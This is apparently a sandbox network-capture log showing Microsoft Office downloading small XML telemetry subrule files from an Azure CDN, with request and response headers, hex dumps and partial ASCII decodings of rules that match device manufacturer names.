            Date: Thu, 21 Nov 2024 08:50:25 GMT
            Content-Type: text/xml
            Content-Length: 468
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
            ETag: "0x8DC582B9C8E04C8"
            x-ms-request-id: 70a27cfa-201e-0051-248c-3a7340000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085025Z-1777c6cb754dqb2khC1TEBmk1s0000000avg0000000066bd
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:25 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            32192.168.2.44978513.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:27 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:28 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:27 GMT
            Content-Type: text/xml
            Content-Length: 428
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
            ETag: "0x8DC582BAC4F34CA"
            x-ms-request-id: 5bcf05b2-a01e-006f-6e7a-3b13cd000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085027Z-1777c6cb754b7tdghC1TEBwwa40000000b00000000006ted
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:28 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


            Session IDSource IPSource PortDestination IPDestination Port
            33192.168.2.44978813.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:27 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:28 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:27 GMT
            Content-Type: text/xml
            Content-Length: 471
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
            ETag: "0x8DC582BB5815C4C"
            x-ms-request-id: a24720e5-f01e-0096-3f65-3b10ef000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085027Z-178bfbc474bq2pr7hC1NYCkfgg00000001eg000000002ea2
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:28 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            34192.168.2.44978613.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:27 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:28 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:28 GMT
            Content-Type: text/xml
            Content-Length: 499
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
            ETag: "0x8DC582B98CEC9F6"
            x-ms-request-id: be70ec4e-301e-000c-088c-3a323f000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085028Z-1777c6cb754xjpthhC1TEBexs80000000aq000000000akdz
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:28 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            35192.168.2.44978713.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:27 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:28 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:28 GMT
            Content-Type: text/xml
            Content-Length: 415
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
            ETag: "0x8DC582B988EBD12"
            x-ms-request-id: 6a83a5f2-e01e-000c-157b-3b8e36000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085028Z-178bfbc474bp8mkvhC1NYCzqnn00000000zg00000000dr12
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:28 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


            Session IDSource IPSource PortDestination IPDestination Port
            36192.168.2.44978913.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:28 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:28 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:28 GMT
            Content-Type: text/xml
            Content-Length: 419
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
            ETag: "0x8DC582BB32BB5CB"
            x-ms-request-id: 15a67567-d01e-0066-07eb-3bea17000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085028Z-r1d97b99577l6wbzhC1TEB3fwn0000000a4000000000eusv
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:28 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


            Session IDSource IPSource PortDestination IPDestination Port
            37192.168.2.44979113.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:29 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:30 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:30 GMT
            Content-Type: text/xml
            Content-Length: 494
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
            ETag: "0x8DC582BB8972972"
            x-ms-request-id: 3af7945d-501e-0016-1564-3b181b000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085030Z-178bfbc474b9fdhphC1NYCac0n0000000170000000003u70
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:30 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            38192.168.2.44979413.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:29 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:30 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:30 GMT
            Content-Type: text/xml
            Content-Length: 427
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
            ETag: "0x8DC582BA909FA21"
            x-ms-request-id: c296684d-b01e-0053-2a99-3bcdf8000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085030Z-r1d97b99577dd2gchC1TEBz5ys0000000a1000000000297v
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:30 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


            Session IDSource IPSource PortDestination IPDestination Port
            39192.168.2.44979213.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:29 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:30 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:30 GMT
            Content-Type: text/xml
            Content-Length: 420
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
            ETag: "0x8DC582B9DAE3EC0"
            x-ms-request-id: 81672928-a01e-001e-4184-3b49ef000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085030Z-1777c6cb754xjpthhC1TEBexs80000000atg000000001k23
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:30 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


            Session IDSource IPSource PortDestination IPDestination Port
            40192.168.2.44979313.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:30 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:30 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:30 GMT
            Content-Type: text/xml
            Content-Length: 472
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
            ETag: "0x8DC582B9D43097E"
            x-ms-request-id: 334ee23b-a01e-006f-30aa-3b13cd000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085030Z-r1d97b99577sdxndhC1TEBec5n0000000a90000000006n33
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:30 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            41192.168.2.44979513.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:30 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:30 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:30 GMT
            Content-Type: text/xml
            Content-Length: 486
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
            ETag: "0x8DC582B92FCB436"
            x-ms-request-id: 20caaba8-701e-005c-0363-3bbb94000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085030Z-178bfbc474b9xljthC1NYCtw94000000016g00000000362a
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:30 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


            Session IDSource IPSource PortDestination IPDestination Port
            42192.168.2.44979613.107.246.45443
            TimestampBytes transferredDirectionData
            2024-11-21 08:50:32 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
            Connection: Keep-Alive
            Accept-Encoding: gzip
            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
            Host: otelrules.azureedge.net
            2024-11-21 08:50:32 UTC470INHTTP/1.1 200 OK
            Date: Thu, 21 Nov 2024 08:50:32 GMT
            Content-Type: text/xml
            Content-Length: 423
            Connection: close
            Cache-Control: public, max-age=604800, immutable
            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
            ETag: "0x8DC582BB7564CE8"
            x-ms-request-id: e0915331-401e-000a-1f8a-3b4a7b000000
            x-ms-version: 2018-03-28
            x-azure-ref: 20241121T085032Z-r1d97b99577jlrkbhC1TEBq8d00000000a2g000000002vmw
            x-fd-int-roxy-purgeid: 0
            X-Cache: TCP_HIT
            Accept-Ranges: bytes
            2024-11-21 08:50:32 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
